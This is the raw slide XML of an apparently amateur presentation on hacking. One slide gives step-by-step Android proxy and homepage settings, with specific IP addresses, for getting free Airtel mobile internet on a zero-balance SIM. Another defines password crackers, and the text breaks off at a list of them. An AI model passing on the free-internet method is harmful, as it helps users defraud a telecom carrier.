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86" r:id="rId15"/>
    <p:sldId id="268" r:id="rId16"/>
    <p:sldId id="269" r:id="rId17"/>
    <p:sldId id="272" r:id="rId18"/>
    <p:sldId id="273" r:id="rId19"/>
    <p:sldId id="274" r:id="rId20"/>
    <p:sldId id="287"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347274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40962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778800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4150504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409106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129151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275586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2754312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1926180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2841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934E4-4DED-447A-B372-18EF6D520F80}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/30/2013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D2F48-73E0-4900-AB81-19E334A69806}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1716546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934E4-4DED-447A-B372-18EF6D520F80}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/30/2013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D2F48-73E0-4900-AB81-19E334A69806}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41081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2.bp.blogspot.com/-dgfC-_XfzQE/UW7cTMbypoI/AAAAAAAAABk/jFGxL1oExa8/s1600/medium_784056efc4448437931d27f9e617a8a4.jpg"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hyperlink" Target="http://2.bp.blogspot.com/-bPSue5_GyL0/T0olCcEH2cI/AAAAAAAAAps/VWuL6W9MwBc/s1600/setwithbacktrack1.jpg"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hyperlink" Target="http://2.bp.blogspot.com/-vxvULVp3vBg/T0onUuOgZpI/AAAAAAAAAp0/3oDUF-CIUX4/s640/setwithbacktrack2.jpg"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hyperlink" Target="http://4.bp.blogspot.com/-lEyfQOSu0NY/T0osSHO9MsI/AAAAAAAAAqE/YEJVogrY4o8/s640/setwithbacktrack4.jpg" TargetMode="Externa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hyperlink" Target="http://3.bp.blogspot.com/-Elye7p__do4/T0owmacWl0I/AAAAAAAAAqU/ZFsPy8Qf9Ws/s640/setwithbacktrack6.jpg"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hyperlink" Target="http://3.bp.blogspot.com/-sdP2MSAhpGQ/T0ozuCmTRbI/AAAAAAAAAqk/ioz-AkF5TPU/s640/setwithbacktrack8.jpg"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hyperlink" Target="http://3.bp.blogspot.com/-VJDWtgvOtlY/T0o2tLMmmHI/AAAAAAAAAq0/FBPC6bZPRhI/s640/setwithbacktrack9.jpg"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hyperlink" Target="http://3.bp.blogspot.com/-sOqs-J_vUnU/T0o6996zZEI/AAAAAAAAAq8/WZi8K92rpmI/s640/SETWITHBACKTRACK10.jpg" TargetMode="Externa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91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4099" name="Picture 2" descr="Description: C:\Users\kingkhan\Desktop\2-320-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725554"/>
            <a:ext cx="2895600" cy="39226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375629" y="-1002214"/>
            <a:ext cx="8392742" cy="246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40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Hacking Airtel mobile internet:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="4000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1006114" y="4648200"/>
            <a:ext cx="71317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2800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Adobe Fan Heiti Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Fan Heiti Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>For this we need an Android mobile with Airtel sim which has zero balance.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Adobe Fan Heiti Std B" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Adobe Fan Heiti Std B" pitchFamily="34"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rgbClr val="FFFF00"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Adobe Fan Heiti Std B" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Adobe Fan Heiti Std B" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1259646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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="601346" y="323400"/>
            <a:ext cx="4776798" cy="6247864"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <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Go to </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="28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menu</a:t>
            </a:r>
            <a:r>
              <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&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="28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settings</a:t>
            </a:r>
            <a:r>
              <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&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="28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network settings</a:t>
            </a:r>
            <a:r>
              <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&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="28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mobile office settings</a:t>
            </a:r>
            <a:r>
              <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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Aharoni" pitchFamily="2" charset="-79"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Aharoni" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Then go to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Aharoni" pitchFamily="2" charset="-79"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Aharoni" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Aharoni" pitchFamily="2" charset="-79"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Aharoni" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t> settings and in the proxy menu type any free proxy site working in your area for that you have to Google and find the apt proxy for your area e.g.: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Aharoni" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Aharoni" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>69.10.57.142</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Berlin Sans FB Demi" pitchFamily="34" charset="0"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Put the proxy port as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Berlin Sans FB Demi" pitchFamily="34" charset="0"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Berlin Sans FB Demi" pitchFamily="34" charset="0"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="28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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="C:\Users\NAWAZ\Desktop\screen shot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2" y="1428736"/>
            <a:ext cx="3273416"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725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Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571472" y="3857628"/>
            <a:ext cx="8153400" cy="2785378"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="just" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>You have to open your browser and edit the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>homepage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> and type there  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>203.115.112.5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>  and save it.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Berlin Sans FB Demi" pitchFamily="34" charset="0"/>
              <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Now you have to save and restart your mobile.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>o to your browser and click on Homepage..</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tada!</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> , you’re connected to internet free of cost.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Aharoni" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Aharoni" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6147" name="Picture 3" descr="C:\Users\NAWAZ\Desktop\screen shots\2screensh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82" y="357166"/>
            <a:ext cx="2360324" cy="331920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NAWAZ\Desktop\screen shots\3screensh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3175" y="344694"/>
            <a:ext cx="2129718" cy="337005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NAWAZ\Desktop\screen shots\4screensh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6314" y="357166"/>
            <a:ext cx="1828799" cy="335758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NAWAZ\Desktop\screen shots\5screensh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43702" y="357166"/>
            <a:ext cx="2164369" cy="327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97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8195" name="Picture 7" descr="Description: C:\Users\kingkhan\Deskto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8538" y="2453483"/>
            <a:ext cx="4615490" cy="43768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0" y="5524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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20782" y="0"/>
            <a:ext cx="7924800" cy="2062103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="just" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="32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Password crackers:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="32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2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>It is a </a:t>
            </a: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program, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>password recovery tool</a:t>
            </a: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 or a password unlocker/reset tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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It</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>"cracks"</a:t>
            </a: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 a password, either by discovering the password</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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bypassing the encryption</a:t>
            </a:r>
            <a:r>
              <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a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="24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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="124692" y="1938765"/>
            <a:ext cx="4860032" cy="5170646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="just" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pP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Some of the password crackers are:</a:t>
            </a:r>
